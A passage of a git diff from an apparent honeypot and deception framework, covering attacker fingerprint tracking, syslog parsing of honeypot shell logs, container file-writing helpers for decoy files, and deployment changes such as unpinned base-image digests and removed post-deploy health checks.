)
|
||||
).first()
|
||||
|
||||
if row is None:
|
||||
session.add(AttackerFingerprintState(
|
||||
uuid=str(_uuid.uuid4()),
|
||||
attacker_uuid=attacker.uuid,
|
||||
port=port,
|
||||
probe_type=probe_type,
|
||||
last_hash=new_hash,
|
||||
last_seen=ts,
|
||||
rotation_count=0,
|
||||
))
|
||||
session.commit()
|
||||
return RotationOutcome(
|
||||
kind="first_sighting",
|
||||
old_hash=None,
|
||||
new_hash=new_hash,
|
||||
rotation_count=0,
|
||||
)
|
||||
|
||||
if row.last_hash == new_hash:
|
||||
row.last_seen = ts
|
||||
session.add(row)
|
||||
session.commit()
|
||||
return RotationOutcome(
|
||||
kind="unchanged",
|
||||
old_hash=row.last_hash,
|
||||
new_hash=new_hash,
|
||||
rotation_count=row.rotation_count,
|
||||
)
|
||||
|
||||
old_hash = row.last_hash
|
||||
row.last_hash = new_hash
|
||||
row.last_seen = ts
|
||||
row.rotation_count += 1
|
||||
session.add(row)
|
||||
|
||||
attacker.rotation_count += 1
|
||||
attacker.last_rotation_at = ts
|
||||
session.add(attacker)
|
||||
|
||||
payload: dict[str, Any] = {
|
||||
"attacker_uuid": attacker.uuid,
|
||||
"attacker_ip": attacker_ip,
|
||||
"port": port,
|
||||
"probe_type": probe_type,
|
||||
"old_hash": old_hash,
|
||||
"new_hash": new_hash,
|
||||
"rotation_count": row.rotation_count,
|
||||
"ts": ts.isoformat(),
|
||||
}
|
||||
|
||||
if publish_fn is not None:
|
||||
publish_fn(_ROTATED_EVENT_TYPE, payload)
|
||||
if syslog_fn is not None:
|
||||
syslog_fn(_ROTATED_EVENT_TYPE, payload)
|
||||
|
||||
session.commit()
|
||||
|
||||
return RotationOutcome(
|
||||
kind="rotated",
|
||||
old_hash=old_hash,
|
||||
new_hash=new_hash,
|
||||
rotation_count=row.rotation_count,
|
||||
)
|
||||
@@ -32,21 +32,6 @@ _RFC5424_RE = re.compile(
|
||||
r"(.+)$", # 5: SD element + optional MSG
|
||||
)
|
||||
|
||||
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
|
||||
# Docker-stdout collector envelope wraps the inner ``logger
|
||||
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
|
||||
# real MSGID lives in the body. Mirrors the unwrap logic in
|
||||
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
|
||||
# read the same on-wire format.
|
||||
_INNER_RFC5424_RE = re.compile(
|
||||
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||
r"(\S+)\s+" # 3: inner APP-NAME
|
||||
r"\S+\s+" # PROCID (NIL or PID)
|
||||
r"(\S+)\s+" # 4: inner MSGID
|
||||
r"(.+)$", # 5: inner SD/MSG remainder
|
||||
)
|
||||
|
||||
# Structured data block: [relay@55555 k="v" ...]
|
||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||
|
||||
@@ -136,21 +121,6 @@ def parse_line(line: str) -> LogEvent | None:
|
||||
|
||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||
|
||||
# Unwrap double-wrapped Docker-stdout envelopes around bash
|
||||
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
|
||||
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
|
||||
# before the decky/service NIL-guard below — the OUTER decky is
|
||||
# the docker host, the inner header carries the real source.
|
||||
if event_type == "-" and sd_rest.startswith("-"):
|
||||
body = sd_rest[1:].lstrip()
|
||||
inner = _INNER_RFC5424_RE.match(body)
|
||||
if inner is not None:
|
||||
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||
decky = i_host
|
||||
service = i_app
|
||||
event_type = i_msgid
|
||||
sd_rest = i_rest
|
||||
|
||||
if decky == "-" or service == "-":
|
||||
return None
|
||||
|
||||
@@ -167,19 +137,6 @@ def parse_line(line: str) -> LogEvent | None:
|
||||
msg = tail.group(1).strip() if tail else ""
|
||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||
|
||||
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||
event_type = "command"
|
||||
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||
fields.setdefault(k, v)
|
||||
if sep:
|
||||
fields.setdefault("command", cmd_rest)
|
||||
|
||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||
# belong in the substrate-state index, not the per-IP attacker one.
|
||||
kind: EventKind = (
|
||||
|
||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
||||
wake_tasks.append(asyncio.create_task(
|
||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||
))
|
||||
except Exception as exc:
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||
exc,
|
||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
||||
results = await engine.correlate_credential_reuse(
|
||||
repo, min_targets=min_targets,
|
||||
)
|
||||
except Exception:
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception("reuse correlator: tick failed")
|
||||
results = []
|
||||
|
||||
@@ -120,11 +120,11 @@ async def run_reuse_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
||||
wake.set()
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception as exc:
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||
pattern, exc,
|
||||
|
||||
@@ -1,39 +0,0 @@
|
||||
"""Shared primitives for writing/deleting files inside running deckies.
|
||||
|
||||
The canary planter and the orchestrator SSH driver both need to drop
|
||||
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||
before this module existed.
|
||||
|
||||
Public API:
|
||||
|
||||
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||
optionally backdate mtime.
|
||||
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||
* :func:`resolve_topology_container` — pick the right docker container
|
||||
for a MazeNET decky based on its services list.
|
||||
* :func:`resolve_decky_container` — async helper that takes
|
||||
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||
and returns the docker container name.
|
||||
|
||||
Container resolution conventions are documented in
|
||||
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||
a runtime dependency on the compose generator.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from .resolve import (
|
||||
resolve_decky_container,
|
||||
resolve_topology_container,
|
||||
)
|
||||
from .write import (
|
||||
delete_file_from_container,
|
||||
write_file_to_container,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
"delete_file_from_container",
|
||||
"resolve_decky_container",
|
||||
"resolve_topology_container",
|
||||
"write_file_to_container",
|
||||
]
|
||||
@@ -1,72 +0,0 @@
|
||||
"""Decky-name → docker container name resolution.
|
||||
|
||||
Two scopes:
|
||||
|
||||
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||
target it because it carries the most realistic filesystem layout.
|
||||
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||
decky exposes the ssh service; otherwise the decky's base container
|
||||
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||
:func:`decnet.topology.compose._container_name`).
|
||||
|
||||
Keeping resolution centralised here means new ``docker exec`` callers
|
||||
(file drops, future bulk planters, etc.) never need to learn the
|
||||
naming conventions — they just call :func:`resolve_decky_container`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||
|
||||
|
||||
def resolve_topology_container(
|
||||
topology_id: str, decky_name: str, services: Iterable[str],
|
||||
) -> str:
|
||||
"""Container name for a MazeNET decky.
|
||||
|
||||
See module docstring for the convention. Pure function — no I/O.
|
||||
"""
|
||||
if "ssh" in set(services):
|
||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||
return f"decnet_t_{topology_id[:8]}_{decky_name}"
|
||||
|
||||
|
||||
async def resolve_decky_container(
|
||||
repo: Any,
|
||||
decky_name: str,
|
||||
*,
|
||||
topology_id: Optional[str] = None,
|
||||
) -> str:
|
||||
"""Resolve the docker container name for *decky_name*.
|
||||
|
||||
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
|
||||
unconditionally. No DB lookup — the caller is responsible for
|
||||
knowing the decky exists; if it doesn't, the subsequent
|
||||
``docker exec`` returns a clear error.
|
||||
|
||||
Topology path: hydrates the topology, looks up the decky's services
|
||||
list, delegates to :func:`resolve_topology_container`.
|
||||
|
||||
Raises:
|
||||
LookupError — when ``topology_id`` is set but the topology or
|
||||
its named decky doesn't exist. Callers translate this into
|
||||
404/422 at the API layer.
|
||||
"""
|
||||
if topology_id is None:
|
||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||
|
||||
from decnet.topology.persistence import hydrate
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
raise LookupError(f"topology {topology_id!r} not found")
|
||||
for decky in hydrated["deckies"]:
|
||||
cfg = decky.get("decky_config") or {}
|
||||
name = cfg.get("name") or decky.get("name")
|
||||
if name == decky_name:
|
||||
services = decky.get("services") or []
|
||||
return resolve_topology_container(topology_id, decky_name, services)
|
||||
raise LookupError(
|
||||
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||
)
|
||||
@@ -1,124 +0,0 @@
|
||||
"""``docker exec``-driven file write/delete inside a decky container.
|
||||
|
||||
The write path streams a base64-encoded payload over stdin to
|
||||
``base64 -d`` inside the container, so binary content of any size up
|
||||
to docker's stream limits is safe — interpolating bytes into argv
|
||||
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import shlex
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("decky_io.write")
|
||||
|
||||
_DOCKER = "docker"
|
||||
_DEFAULT_TIMEOUT = 8.0
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _run(
|
||||
argv: list[str],
|
||||
*,
|
||||
stdin_bytes: Optional[bytes] = None,
|
||||
timeout: float = _DEFAULT_TIMEOUT,
|
||||
) -> tuple[int, str, str]:
|
||||
try:
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv,
|
||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||
stdout=asyncio.subprocess.PIPE,
|
||||
stderr=asyncio.subprocess.PIPE,
|
||||
)
|
||||
except FileNotFoundError as exc:
|
||||
return 127, "", f"argv[0] not found: {exc}"
|
||||
try:
|
||||
stdout, stderr = await asyncio.wait_for(
|
||||
proc.communicate(input=stdin_bytes), timeout=timeout,
|
||||
)
|
||||
except asyncio.TimeoutError:
|
||||
try:
|
||||
proc.kill()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return 124, "", "timeout"
|
||||
return (
|
||||
proc.returncode if proc.returncode is not None else -1,
|
||||
stdout.decode("utf-8", "replace"),
|
||||
stderr.decode("utf-8", "replace"),
|
||||
)
|
||||
|
||||
|
||||
async def write_file_to_container(
|
||||
container: str,
|
||||
path: str,
|
||||
content: bytes,
|
||||
*,
|
||||
mode: int = 0o644,
|
||||
mtime: Optional[datetime] = None,
|
||||
timeout: float = _DEFAULT_TIMEOUT,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Write *content* to *path* inside *container* via ``docker exec``.
|
||||
|
||||
The directory above *path* is created if missing; *mode* is applied
|
||||
after the write; when *mtime* is provided the file is backdated via
|
||||
``touch -d`` (UTC ISO 8601).
|
||||
|
||||
Returns ``(success, error_or_none)``. ``error`` is the trimmed
|
||||
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
|
||||
"""
|
||||
if not path:
|
||||
return False, "empty path"
|
||||
|
||||
encoded = base64.b64encode(content)
|
||||
parts = [
|
||||
f"mkdir -p {shlex.quote(_dirname(path))}",
|
||||
f"base64 -d > {shlex.quote(path)}",
|
||||
f"chmod {mode:o} {shlex.quote(path)}",
|
||||
]
|
||||
if mtime is not None:
|
||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
|
||||
sh_cmd = " && ".join(parts)
|
||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
|
||||
success = rc == 0
|
||||
if success:
|
||||
return True, None
|
||||
err = stderr.strip()[:256] or f"rc={rc}"
|
||||
log.warning(
|
||||
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
|
||||
container, path, rc, stderr[:120],
|
||||
)
|
||||
return False, err
|
||||
|
||||
|
||||
async def delete_file_from_container(
|
||||
container: str,
|
||||
path: str,
|
||||
*,
|
||||
timeout: float = _DEFAULT_TIMEOUT,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Best-effort ``rm -f`` of *path* inside *container*.
|
||||
|
||||
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
|
||||
when the file is already gone, so a True result here means "the
|
||||
file is not present after this call", regardless of who unlinked it.
|
||||
"""
|
||||
sh_cmd = f"rm -f {shlex.quote(path)}"
|
||||
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv, timeout=timeout)
|
||||
if rc == 0:
|
||||
return True, None
|
||||
return False, stderr.strip()[:256] or f"rc={rc}"
|
||||
@@ -18,86 +18,69 @@ class DistroProfile:
|
||||
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
|
||||
|
||||
|
||||
# Base images are pinned by digest (sha256) to make `docker pull`
|
||||
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
|
||||
# can't silently swap content under us. The :tag is kept for human
|
||||
# readability; the @sha256 is what Docker actually resolves.
|
||||
# Refresh procedure: `docker pull <tag>` then `docker inspect
|
||||
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
|
||||
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
|
||||
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
|
||||
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
|
||||
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
|
||||
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
|
||||
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
|
||||
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
|
||||
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
|
||||
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
|
||||
|
||||
|
||||
DISTROS: dict[str, DistroProfile] = {
|
||||
"debian": DistroProfile(
|
||||
slug="debian",
|
||||
image=_DEBIAN_BOOKWORM,
|
||||
image="debian:bookworm-slim",
|
||||
display_name="Debian 12 (Bookworm)",
|
||||
hostname_style="generic",
|
||||
build_base=_DEBIAN_BOOKWORM,
|
||||
build_base="debian:bookworm-slim",
|
||||
),
|
||||
"ubuntu22": DistroProfile(
|
||||
slug="ubuntu22",
|
||||
image=_UBUNTU_22_04,
|
||||
image="ubuntu:22.04",
|
||||
display_name="Ubuntu 22.04 LTS (Jammy)",
|
||||
hostname_style="generic",
|
||||
build_base=_UBUNTU_22_04,
|
||||
build_base="ubuntu:22.04",
|
||||
),
|
||||
"ubuntu20": DistroProfile(
|
||||
slug="ubuntu20",
|
||||
image=_UBUNTU_20_04,
|
||||
image="ubuntu:20.04",
|
||||
display_name="Ubuntu 20.04 LTS (Focal)",
|
||||
hostname_style="generic",
|
||||
build_base=_UBUNTU_20_04,
|
||||
build_base="ubuntu:20.04",
|
||||
),
|
||||
"rocky9": DistroProfile(
|
||||
slug="rocky9",
|
||||
image=_ROCKY_9,
|
||||
image="rockylinux:9-minimal",
|
||||
display_name="Rocky Linux 9",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"centos7": DistroProfile(
|
||||
slug="centos7",
|
||||
image=_CENTOS_7,
|
||||
image="centos:7",
|
||||
display_name="CentOS 7",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"alpine": DistroProfile(
|
||||
slug="alpine",
|
||||
image=_ALPINE_3_19,
|
||||
image="alpine:3.19",
|
||||
display_name="Alpine Linux 3.19",
|
||||
hostname_style="minimal",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"fedora": DistroProfile(
|
||||
slug="fedora",
|
||||
image=_FEDORA_39,
|
||||
image="fedora:39",
|
||||
display_name="Fedora 39",
|
||||
hostname_style="rhel",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
"kali": DistroProfile(
|
||||
slug="kali",
|
||||
image=_KALI_ROLLING,
|
||||
image="kalilinux/kali-rolling",
|
||||
display_name="Kali Linux (Rolling)",
|
||||
hostname_style="rolling",
|
||||
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
|
||||
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
|
||||
),
|
||||
"arch": DistroProfile(
|
||||
slug="arch",
|
||||
image=_ARCH_LATEST,
|
||||
image="archlinux:latest",
|
||||
display_name="Arch Linux",
|
||||
hostname_style="rolling",
|
||||
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
|
||||
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@@ -3,7 +3,6 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import shutil
|
||||
import subprocess # nosec B404
|
||||
import time
|
||||
@@ -58,8 +57,6 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
|
||||
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
|
||||
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
|
||||
_NTLMSSP_SERVICES = {"smb", "rdp"}
|
||||
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
|
||||
_CADDY_SERVICES = {"http", "https"}
|
||||
|
||||
|
||||
def _sync_logging_helper(config: DecnetConfig) -> None:
|
||||
@@ -166,104 +163,6 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
||||
shutil.copy2(src, dest)
|
||||
|
||||
|
||||
def _chown_tree(dest: Path, owner_ref: Path) -> None:
|
||||
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
|
||||
import os
|
||||
if os.geteuid() != 0:
|
||||
return
|
||||
st = owner_ref.stat()
|
||||
uid, gid = st.st_uid, st.st_gid
|
||||
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
|
||||
for p in targets:
|
||||
try:
|
||||
os.lchown(p, uid, gid)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
def _sync_caddy_modules(config: DecnetConfig) -> None:
|
||||
"""Mirror _caddy_modules/ into http/https build contexts.
|
||||
|
||||
The xcaddy builder stage in each Dockerfile references
|
||||
``_caddy_modules/decnetfp`` relative to its build context (the
|
||||
per-service template dir). Since the canonical source lives one
|
||||
level up at ``templates/_caddy_modules/``, we sync it into each
|
||||
active http/https build context before compose up, mirroring the
|
||||
sessrec / auth-helper patterns.
|
||||
"""
|
||||
from decnet.services.registry import get_service
|
||||
src_dir = _CANONICAL_CADDY_MODULES_DIR
|
||||
if not src_dir.is_dir():
|
||||
return
|
||||
seen: set[Path] = set()
|
||||
for decky in config.deckies:
|
||||
for svc_name in decky.services:
|
||||
if svc_name not in _CADDY_SERVICES:
|
||||
continue
|
||||
svc = get_service(svc_name)
|
||||
if svc is None:
|
||||
continue
|
||||
ctx = svc.dockerfile_context()
|
||||
if ctx is None or ctx in seen:
|
||||
continue
|
||||
seen.add(ctx)
|
||||
dest_dir = ctx / "_caddy_modules"
|
||||
dest_dir.mkdir(exist_ok=True)
|
||||
for child in src_dir.iterdir():
|
||||
dest_child = dest_dir / child.name
|
||||
if child.is_dir():
|
||||
if dest_child.exists():
|
||||
shutil.rmtree(dest_child)
|
||||
shutil.copytree(child, dest_child)
|
||||
_chown_tree(dest_child, src_dir)
|
||||
else:
|
||||
if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
|
||||
shutil.copy2(child, dest_child)
|
||||
_chown_tree(dest_child, src_dir)
|
||||
|
||||
|
||||
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
|
||||
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
|
||||
|
||||
Used for post-deploy verification: ``compose up -d`` returns 0 the
|
||||
moment containers are *started*, but a service that crashes on boot
|
||||
(port collision, bad image, missing dependency) only shows up here.
|
||||
Returns an empty list when compose has nothing to report (and on
|
||||
parse failure — caller treats that as 'unverifiable, don't gate').
|
||||
"""
|
||||
cmd = [
|
||||
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
|
||||
"ps", "--all", "--format", "json",
|
||||
]
|
||||
try:
|
||||
result = subprocess.run( # nosec B603
|
||||
cmd, capture_output=True, text=True, check=False,
|
||||
)
|
||||
except FileNotFoundError:
|
||||
return []
|
||||
if result.returncode != 0:
|
||||
return []
|
||||
rows: list[dict[str, object]] = []
|
||||
# ``docker compose ps --format json`` emits one JSON object per line
|
||||
# (newline-delimited), not a JSON array. Parse line-by-line so a
|
||||
# single bad line doesn't poison the whole result.
|
||||
for line in (result.stdout or "").splitlines():
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
try:
|
||||
obj = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
continue
|
||||
if isinstance(obj, dict):
|
||||
rows.append(obj)
|
||||
elif isinstance(obj, list):
|
||||
for item in obj:
|
||||
if isinstance(item, dict):
|
||||
rows.append(item)
|
||||
return rows
|
||||
|
||||
|
||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||
import os
|
||||
# -p decnet pins the compose project name. Without it, docker compose
|
||||
@@ -494,8 +393,6 @@ def _compose_with_retry(
|
||||
console.print(f"[red]{result.stderr.strip()}[/]")
|
||||
log.error("docker compose %s failed after %d attempts: %s",
|
||||
" ".join(args), retries, result.stderr.strip())
|
||||
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
|
||||
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
|
||||
raise last_exc
|
||||
|
||||
|
||||
@@ -665,7 +562,6 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
|
||||
_sync_sessrec_sources(config)
|
||||
_sync_auth_helper_sources(config)
|
||||
_sync_ntlmssp_sources(config)
|
||||
_sync_caddy_modules(config)
|
||||
|
||||
compose_path = write_compose(config, COMPOSE_FILE)
|
||||
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
|
||||
@@ -1055,84 +951,8 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
||||
)
|
||||
raise
|
||||
|
||||
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||
# containers are *started*, so a service that crashes on boot
|
||||
# (port bind failure, bad image, missing dependency) leaves the
|
||||
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||
# container isn't running — operators see real state instead of an
|
||||
# optimistic flag.
|
||||
ps_rows = await anyio.to_thread.run_sync(
|
||||
lambda: _compose_ps(compose_path),
|
||||
)
|
||||
bad: list[str] = []
|
||||
# Build the per-decky state map. The base container's compose
|
||||
# service name == decky name, which is what we cache on the
|
||||
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||
# don't gate the decky's state — service-level failures are visible
|
||||
# in compose ps separately and don't downgrade the decky as a whole.
|
||||
decky_state_by_name: dict[str, str] = {}
|
||||
for row in ps_rows:
|
||||
state = str(row.get("State", "")).lower()
|
||||
service_name = str(row.get("Service") or "")
|
||||
if service_name and "-" not in service_name:
|
||||
# Plain decky base; cache its docker state.
|
||||
decky_state_by_name[service_name] = state or "unknown"
|
||||
if state and state != "running":
|
||||
name = str(row.get("Name") or row.get("Service") or "?")
|
||||
exit_code = row.get("ExitCode")
|
||||
bad.append(
|
||||
f"{name}={state}"
|
||||
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||
)
|
||||
|
||||
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||
# this, the row stays at the default 'pending' forever and the
|
||||
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||
# actually up.
|
||||
for decky in hydrated["deckies"]:
|
||||
cfg = decky.get("decky_config") or {}
|
||||
decky_name = cfg.get("name") or decky.get("name")
|
||||
if not decky_name:
|
||||
continue
|
||||
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||
new_state = "running" if ds == "running" else "failed"
|
||||
try:
|
||||
await repo.update_topology_decky(
|
||||
decky["uuid"], {"state": new_state},
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
|
||||
if bad:
|
||||
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||
)
|
||||
await transition_status(
|
||||
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||
)
|
||||
log.warning(
|
||||
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||
topology_id, len(bad), reason,
|
||||
)
|
||||
else:
|
||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||
|
||||
# Best-effort canary baseline seed across every decky in the
|
||||
# topology. Same resilience contract as the fleet path: failures
|
||||
# surface as state=failed token rows, never abort the deploy.
|
||||
try:
|
||||
from decnet.canary import planter as _canary_planter
|
||||
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||
topology_id, exc,
|
||||
)
|
||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||
|
||||
|
||||
@_traced("engine.teardown_topology")
|
||||
|
||||
@@ -1,673 +0,0 @@
|
||||
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||
|
||||
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||
orchestration: regenerate the compose file (so future redeploys reflect
|
||||
the change), persist the new ``services`` list, and run the targeted
|
||||
